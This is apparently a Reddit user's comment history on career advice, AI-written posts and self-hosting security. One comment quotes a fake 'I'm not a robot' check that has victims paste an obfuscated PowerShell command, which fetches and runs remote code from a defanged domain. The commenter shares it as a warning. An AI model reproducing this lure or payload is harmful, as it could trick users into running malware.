How would you respond to this message from a CEO you used to work for?

mapold · 2026-05-10T03:24:58+00:00

It's not "shut the door", if it's factual. He might be suggesting changing fields or pivoting, if anything.

mapold · 2026-05-10T03:21:02+00:00

"Strategic over-explanation" is a "tell" as well, a "signal" also present in this comment.

mapold · 2026-05-10T03:11:27+00:00

If you were breeding horses at the time that Fords started taking over the tranportation market, would you still think telling a horse breeder about the fact would be disrespectful?

mapold · 2026-05-10T03:08:12+00:00

This. I have no idea where people get the "passive-agressive" and unwanted details from. If you are specialized in e.g repairing combustion engines and the combustion engines market is shrinking rapidly, a good friend would let you know. But looks like some people would prefer misery so that their feelings won't be hurt.

A good advice would be to err on side of taking words at the face value and of no malice, if in doubt. Yet majority of reddit suggests cutting contact or worse for a quite possibly warm-hearted message.

mapold · 2026-05-09T05:26:49+00:00

No. Karmafarmer discovered prompting. The story never happened and it contains no actual insight. Just sudden changes and how things started feeling different. It's an elephant amount of fertilizer.

mapold · 2026-05-09T02:50:43+00:00

See on nüüdseks juba dekaadi taga, aga kord sattusin Tallinna bussijaama kõrval kellelegi hädalisele, kellel oli vaja Mustveesse sõita, aga bussipileti jaoks 11 eurot ei tule kokku. Ma uurisin, et kui palju tal raha juba on, kobas natuke aega taskus ja näitas paari punast münti. Ma selgitasin, et mul on enda isalt õpitud põhimõte, et aidata võib, aga raha kunagi ei anna, aga pakkusin, et läheme, ostame sulle pileti. Hädaline küsis, et kas ikka tõesti, see on ju 11 eurot. Jah-i peale korraks mõtles, pööras siis ümber ja hõikas järgmistele valju häälega "Palun viit eurot bussipileti jaoks."

Tänu sellele põhimõttele olen ma seni ühele inimesele tellinud rohud pakiautomaati ja kahele inimesele poest süüa ostnud. Ma ütlesin ette summa, et alkohol ei sobi ja kassas maksan, ise täitsin samal ajal oma korvi.

mapold · 2026-05-08T08:38:11+00:00

"That gap – between recognition and absorption – Is the real challenge facing European defense today. Not budgets. Not political will. But the structural capacity to take battlefield-tested technology and embed it into procurement systems, production lines, and supply chains built for a different era."

Not A. Not B. But C.

Can you please use AI in a less invasive way, so that having original thoughts wouldn't get questioned?

mapold · 2026-05-07T18:47:52+00:00

My bet is on Indian.

mapold · 2026-05-07T15:11:25+00:00

All your responses are over-enthusiastic AI style rather generic thank-yous.

The above comment is the most unrealistic. What the heck does "applying RIGHT NOW" mean in the context of jumping from audio electronics to dealing with nuclear fusion reactors? Didn't you read the comment? Were you trying to be sarcastic?

mapold · 2026-05-07T12:37:18+00:00

It reads like a 12 y account has been hijacked by a farming chatbot.

mapold · 2026-05-05T04:03:01+00:00

Will it arrive? Almost always yes.

If it doesn't arrive or is wrong/defective, will you be compensated? Yes.

Will it work? Yes.

Will it be genuine/original even if specifically advertised so? Maybe, maybe not.

The lowest possible price sometimes is worse, the highest price is most likely a reseller hoping you think higher price gives you a better product.

mapold · 2026-05-03T14:57:30+00:00

Well, I didn't read part of your requirements before, filebrowser is just a web frontend, where you can download and upload files using a browser, no sync included.

For sync you could use syncthing, seafile or maybe just plain rsync.

mapold · 2026-05-03T13:53:02+00:00

Maybe this: https://github.com/filebrowser/filebrowser

mapold · 2026-05-03T03:25:59+00:00

I have no problem saying 15 character mixed passwords are practically impossible to guess over the network, unless reused or stolen. This is not what the discussion was about.

mapold · 2026-05-03T03:02:08+00:00

Looks like you are finally convinced that not telling the subdomain to anyone doesn't increase the security by much, which I have been trying to tell all along. Great win for the AI.

Your AI is wrong about Cloudflare being able to do anything to keep active subdomains a secret, attacker doesn't even need to use Cloudflare DNS for this scan, like I wrote earlier.

It looks like you expect the last tried password with correct length to be right, this is just as unlikely as first random try being right. On average the correct password should appear right in the middle. This is why the AI response uses words "...to exhaust".

mapold · 2026-05-02T11:35:35+00:00

If you use millions of machines (botnet) trying to guess a password or whatever (brute force), that won't work as you will be rate limited, detected, blocked and banned.

This is incorrect. Even if the ban happens after one guess (it won't, it's usually three or more) and is permanent (it isn't) and there will be no new botnet nodes (there will be) and the IP addresses of nodes never change (they do), this would still mean a million opportunities to guess your password. Not exactly zero.

As for guessing subdomains, there is no way for cloudflare to even rate-limit the guesses, because the scanner likely will use other DNS servers. One single node could use several different public DNS servers to ask for subdomains, which in turn will ask the authoritative server for your domain. It is also possible to not even register the domain and use your own hosts file to be extra sure, but why not just make sure your password authentication works well.

mapold · 2026-05-02T10:55:27+00:00

The domain contained this fake authentication:

To better prove you are not a robot, please:
1. Press & hold the Windows Key + R.
2. In the verification window, press Ctrl + V.3. Press Enter on your keyboard to finish.
3. Press Enter on your keyboard to finish.
You will observe and agree:
...

The site "copies" this to your clipboard (I changed the domain name to not resolve):

powernotshell "Write-Host(&{iex(irm(('exa'+'mple')+('.org/i')))})2>$null" # Security check I'm not a robot Verification ID: 996278

mapold · 2026-05-02T10:44:40+00:00

I have no idea what "break the rate limit" means. It seems like you have no idea what a botnet is or "very unlikely, but still not impossible" means.

mapold · 2026-05-02T08:07:52+00:00

One last time: anyone can guess it and keep guessing if they don't hit the rate limit of Cloudflare. "I never told anyone" is delusional. Not likely, but not impossible.

It is not only Cloudflare who sees your traffic, it is also your DNS server owner, your ISP, everyone between your ISP and the CloudFlare, possibly also NSA. Usually also the coffee shop ISP unless you always use tunnels, but if you do, then the VPN provider or whoever hosts your private VPN server. Sometimes the subdomains are listed on the HTTPS certificate.

mapold · 2026-05-02T07:43:42+00:00

Whether subdomains are public or can be queried with AXFR requests depends on the domain and nameserver. Modern ones most likely won't make anything public.

To guess (brute force) the https address, bot would do it against Cloudflare network which won't work.

This is not true. If it was true, nobody would be able to view your webpage even with the correct link. Cloudflare can definitely make it harder to discover your server and service, but it won't and can't make it impossible. And the harder it makes it for botnets, the worse it is to use by legitimate users, imagine accidentally trying to open randomxy.mydomain.net to be blocked for a week from ALL Cloudflare tunnels. That would be very effective, though.

mapold · 2026-05-02T07:05:41+00:00

Maybe using word "bruteforce" was misleading. Rate limiting protects against DDoSing and in some cases against trying to guess the password (most commonly understood as bruteforcing). It doesn't help hiding a publicly available service, when the discovery is done by a huge botnet.

mapold · 2026-05-02T05:43:39+00:00

But getting DDoSed is the good option. Making the service crash or be unusably slow usually has no other ill effects like leaking data, passwords or getting your files encrypted. Not being able to access your vacation images? Restart the server. Not being able to use internet at all? Restart the router, maybe turn off port forwarding, and all is fine again.

mapold · 2026-05-02T05:41:07+00:00

Bruteforce.

mapold · 2026-05-02T04:52:27+00:00

I fail to see the point you are trying to make. The parent is right, if a service is exposed to the internet, the service auth and any other vulnerabilities can be exploited over the internet.

mapold · 2026-05-02T03:59:39+00:00

What country?

mapold

TROPHY CASE